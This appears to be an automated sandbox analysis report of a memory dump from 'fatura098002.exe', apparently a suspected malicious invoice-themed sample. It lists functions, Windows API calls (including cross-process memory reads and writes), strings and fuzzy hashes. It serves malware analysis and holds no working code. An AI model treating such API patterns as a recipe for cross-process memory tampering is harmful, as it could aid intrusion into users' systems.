Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 553df3824c214b909a5e443d6513bc0ff05d701074401ba4d6a0fef1620ea6f6
Instruction ID: c0adc4e1f8c7a0f4420694b4bed655de35296beb4520531c28351f7ce224c024
Opcode Fuzzy Hash: 553df3824c214b909a5e443d6513bc0ff05d701074401ba4d6a0fef1620ea6f6
Instruction Fuzzy Hash: 67F0AF75200305ABDF220FA49C4DF563B6DEF89762F508415F906C6260CA38DC418A74

Function 00761014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00761036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761045
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0076104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761062

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: fb4b066347a8e166e3a46c7c89ee778b77a530657326a922d70fcf163223c187
Instruction ID: ad2cee25be848d33688eeb3057e964273cc1a8fee30390d096416b350b82f010
Opcode Fuzzy Hash: fb4b066347a8e166e3a46c7c89ee778b77a530657326a922d70fcf163223c187
Instruction Fuzzy Hash: B2F0A975200305ABDF221FA8EC4DF5A3BADEF89761F604416FA06D6260CA38DC418AB4

Function 0077030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770324
CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770331
CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 0077033E
CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 0077034B
CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770358
CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770365

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ebdbcfe4d45e3ef730c932cc4d436bdbc40e732c8c77cff889d0af54cdca52f7
Instruction ID: dfe2943836f4c49c9d06e1e13d91b4f8dcd448a820f078b4baf8d7ef3e852ade
Opcode Fuzzy Hash: ebdbcfe4d45e3ef730c932cc4d436bdbc40e732c8c77cff889d0af54cdca52f7
Instruction Fuzzy Hash: 2C019C72800B15DFCB30AF66D880812FBF9BE60255315CA3FD1AA52931C3B5A959CE80

Function 0073D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0073D752

Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0

_free.LIBCMT ref: 0073D764
_free.LIBCMT ref: 0073D776
_free.LIBCMT ref: 0073D788
_free.LIBCMT ref: 0073D79A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0f7c7b91eac1b67b488af50f17f74034a73cae5cca835e2db8b725a19bf61266
Instruction ID: 1155688938b24818c16f9d41b674860600b52d2229e26b0035fffabe2363cc30
Opcode Fuzzy Hash: 0f7c7b91eac1b67b488af50f17f74034a73cae5cca835e2db8b725a19bf61266
Instruction Fuzzy Hash: F6F01272544214ABA632EB64F9C6D1677DDBB44710F954849F088E7513C73CFC818A68

Function 007322A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007322BE

Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0

_free.LIBCMT ref: 007322D0
_free.LIBCMT ref: 007322E3
_free.LIBCMT ref: 007322F4
_free.LIBCMT ref: 00732305

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 661f96af4e5c3680bd714c86cae71c75b98891c3bf1cbd0f74da9ea614dadc6b
Instruction ID: df48eb3e4f6d6a5878b1cc99f8155f394a8c22140b9c80b32a8cb46bd22c7971
Opcode Fuzzy Hash: 661f96af4e5c3680bd714c86cae71c75b98891c3bf1cbd0f74da9ea614dadc6b
Instruction Fuzzy Hash: 9DF017749021209B9612AF54BC05A093BB4F718760F51954FF454E22B3C73D2813AEEC

Function 007195C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007195D4
StrokeAndFillPath.GDI32(?,?,007571F7,00000000,?,?,?), ref: 007195F0
SelectObject.GDI32(?,00000000), ref: 00719603
DeleteObject.GDI32 ref: 00719616
StrokePath.GDI32(?), ref: 00719631

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 567492a8684b9e7c1cc928588a0ce04c68fe0aeb942fe05eabbd334f0a6a545a
Instruction ID: f2b7a26cccb8de5f3689981bff270d4ab6e72f28238e469197c8a381ed86f057
Opcode Fuzzy Hash: 567492a8684b9e7c1cc928588a0ce04c68fe0aeb942fe05eabbd334f0a6a545a
Instruction Fuzzy Hash: ABF03C30006248EBDB125F69ED2C7A43B71AB00322F44C216F565550F1D73CA9A3DF38

Function 00761874 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0076187F
CloseHandle.KERNEL32(?), ref: 00761894
CloseHandle.KERNEL32(?), ref: 0076189C
GetProcessHeap.KERNEL32(00000000,?), ref: 007618A5
HeapFree.KERNEL32(00000000), ref: 007618AC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessSingleWait
String ID:
API String ID: 3751786701-0
Opcode ID: 2e4bc78b6f149739e97d4387f7ba9f1379b43478f71a99704492785fdf2f4f07
Instruction ID: 0692fca6edbaf5f2ea2c52ba089938dd66798c3a63175f5ecc3a994bb0d49766
Opcode Fuzzy Hash: 2e4bc78b6f149739e97d4387f7ba9f1379b43478f71a99704492785fdf2f4f07
Instruction Fuzzy Hash: 66E0E576044905BBDF025FA1EE0D90ABF39FF49B22B10C222F22581170CB369822DF69

Function 00730F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 007310F9
__freea.LIBCMT ref: 00731117

Part of subcall function 00731537: _free.LIBCMT ref: 0073154F

Strings

a/p, xrefs: 007311DE
am/pm, xrefs: 0073117A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: fd1a56832aab67a228f0992fac19d62ba7c414536e44f09cc688d1192acc4345
Instruction ID: 2c9fc70d297eff884a9360342e52b0b6c21ea40e8ed4a34fa911c7999a116f2a
Opcode Fuzzy Hash: fd1a56832aab67a228f0992fac19d62ba7c414536e44f09cc688d1192acc4345
Instruction Fuzzy Hash: 17D12871A00206CAFB289F68C895BFEB7B1FF06300FA44159E541AB653D37D9D80CB91

Function 0077910C Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

_wcslen.LIBCMT ref: 00779506
_wcslen.LIBCMT ref: 0077952D
75B5D1A0.COMDLG32(00000058), ref: 00779585

Strings

X, xrefs: 00779412

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen
String ID: X
API String ID: 176396367-3081909835
Opcode ID: ea346724decb7e517d8349dda7f5b50d5ef8f6e90567fdcdee4018c41dce59e5
Instruction ID: d974e8d1780ec404b7920d6d96468ae27e48f6dff18a3ba945ecc4807c86ab68
Opcode Fuzzy Hash: ea346724decb7e517d8349dda7f5b50d5ef8f6e90567fdcdee4018c41dce59e5
Instruction Fuzzy Hash: DAE1C431604350DFDB24DF24C885A6AB7E0BF85354F048A6DF9899B2E2DB38DD05CB92

Function 007861D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00720242: RtlEnterCriticalSection.NTDLL(007D070C), ref: 0072024D
Part of subcall function 00720242: RtlLeaveCriticalSection.NTDLL(007D070C), ref: 0072028A

Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9

__Init_thread_footer.LIBCMT ref: 00786238

Part of subcall function 007201F8: RtlEnterCriticalSection.NTDLL(007D070C), ref: 00720202
Part of subcall function 007201F8: RtlLeaveCriticalSection.NTDLL(007D070C), ref: 00720235

Part of subcall function 0077359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007735E4
Part of subcall function 0077359C: LoadStringW.USER32(007D2390,?,00000FFF,?), ref: 0077360A

Strings

x#}, xrefs: 0078636F
x#}, xrefs: 00786353
x#}, xrefs: 0078633A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#}$x#}$x#}
API String ID: 1072379062-1301169260
Opcode ID: 0850682e96a4dd762f50923d9fbbbc5b3f52daa85c266881eccae54e62a54a4b
Instruction ID: dab5a4c20da58be2e86f1dfb7033c057a768fcbe7ebee37b370dc7db1d345292
Opcode Fuzzy Hash: 0850682e96a4dd762f50923d9fbbbc5b3f52daa85c266881eccae54e62a54a4b
Instruction Fuzzy Hash: 4AC17B71A40105EBDB14EF58C894EBEB7B9FF48310F108069FA45AB291DB78ED55CBA0

Function 00735AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JOp, xrefs: 00735BA8, 00735C6C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: JOp
API String ID: 0-2779313138
Opcode ID: c01034da7e18a900597d4c6c4ccc36e41318a562e9370f5e4ba2939686ae1ec3
Instruction ID: b85bfcaefd4026abe9a8cb730bafb1d34bf68964b3aae29133eb9515e03da63f
Opcode Fuzzy Hash: c01034da7e18a900597d4c6c4ccc36e41318a562e9370f5e4ba2939686ae1ec3
Instruction Fuzzy Hash: A951AFB1D0061AEFEB219FA4D849FEEBBB8AF06314F14015AF405A7293D73D99018B71

Function 00738A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00738B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00738B7A
__dosmaperr.LIBCMT ref: 00738B81

Strings

.r, xrefs: 00738A63

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .r
API String ID: 2434981716-397233886
Opcode ID: 1b211b90c26ee4d8fb117371172e26d45aefd3a7ac542dd3226104aac18483ec
Instruction ID: c313e61d10a250a0f4bd2ade40218e3f1216e87c8e1912833b5c6d1aadf8bd0d
Opcode Fuzzy Hash: 1b211b90c26ee4d8fb117371172e26d45aefd3a7ac542dd3226104aac18483ec
Instruction Fuzzy Hash: A2418EF0604256AFEB659F24C880A7DBFE5EB46300F2885AAF49487253DE3D8C029795

Function 00762716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0076B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007621D0,?,?,00000034,00000800,?,00000034), ref: 0076B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00762760

Part of subcall function 0076B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0076B3F8

Part of subcall function 0076B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0076B355
Part of subcall function 0076B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00762194,00000034,?,?,00001004,00000000,00000000), ref: 0076B365
Part of subcall function 0076B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00762194,00000034,?,?,00001004,00000000,00000000), ref: 0076B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007627CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0076281A

Strings

@, xrefs: 00762832

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c57093eb8033d4e61e4376b8c2a701488e8339dbdf5d8449d492ee04ff7c4f31
Instruction ID: 208e77c049ecb1b68597838de09104ce7cb815b4c6e4bc41a880dc53a073ee93
Opcode Fuzzy Hash: c57093eb8033d4e61e4376b8c2a701488e8339dbdf5d8449d492ee04ff7c4f31
Instruction Fuzzy Hash: FD410D76900218AFDB11DFA4CD45EEEBBB8EF05700F108095FA56B7181DB746E85CB61

Function 0073172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\fatura098002.exe,00000104), ref: 00731769
_free.LIBCMT ref: 00731834
_free.LIBCMT ref: 0073183E

Strings

C:\Users\user\Desktop\fatura098002.exe, xrefs: 00731760, 00731767, 00731796, 007317CE

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\fatura098002.exe
API String ID: 2506810119-3534657516
Opcode ID: 00f59be5943c0b46d744ec857768301719f91e99f280843f202293c7579c2fc1
Instruction ID: 7e7111094fae95308eef390ff526a10ba037a0c2cc977f81f1102a0265b3ea2a
Opcode Fuzzy Hash: 00f59be5943c0b46d744ec857768301719f91e99f280843f202293c7579c2fc1
Instruction Fuzzy Hash: FB318075A00218FFEB21DB999C85D9EBBFCEB85320F9481A7F40497212D6789E40CB94

Function 0076C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0076C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0076C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007D1990,00FA3CD8), ref: 0076C395

Strings

0, xrefs: 0076C2DF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

